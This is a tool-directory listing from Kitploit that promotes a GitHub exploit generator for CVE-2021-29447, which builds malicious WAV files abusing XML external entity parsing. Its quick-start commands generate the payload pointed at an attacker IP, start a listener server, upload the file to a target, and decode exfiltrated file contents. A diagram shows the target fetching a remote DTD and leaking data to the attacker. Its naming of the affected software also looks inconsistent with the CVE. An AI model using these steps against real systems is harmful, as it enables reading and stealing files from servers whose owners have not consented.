Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-29447 — A XXE payload generator | Kitploit
Tools/GitHubGitHub/0xricksanchez/cve-2021-29447
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationData ExfiltrationWeb Security
GitHub0xricksanchez/cve-2021-29447

CVE-2021-29447

A XXE payload generator

View Repository
9 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

WAV iXML XXE Exploit Generator

Generates malicious WAV files that exploit XXE vulnerabilities in WordPress plugins parsing iXML metadata chunks (e.g., BookingPress < 1.0.11).

Quick Start

root@kitploit:~
# Generate exploit files
python3 expl.py -i 10.10.14.204 -p 9200

# Start HTTP server
python3 -m http.server 9200

# Upload exploit.wav to target
# Monitor logs for data exfiltration

# Decode exfiltrated data
echo "BASE64_STRING" | base64 -d

Workflow

root@kitploit:~
┌──────────┐    1. Upload     ┌──────────┐
│ Attacker │ ───exploit.wav──>│  Target  │
└──────────┘                   └──────────┘
     ▲                              │
     │                              │ 2. Parse XML
     │                              │
     │ 3. GET /xxe.dtd             │
     │<─────────────────────────────┘
     │
     │ 4. GET /?p=base64_data
     │<─────────────────────────────┐
     │                              │
     └─ Decode and read file        │

Vulnerable Targets

  • WordPress BookingPress Plugin < 1.0.11
  • Any application parsing iXML chunks in WAV files without disabling external entities

References

  • WPScan Vulnerability DB
  • CVE: CVE-2021-29447
Download Tool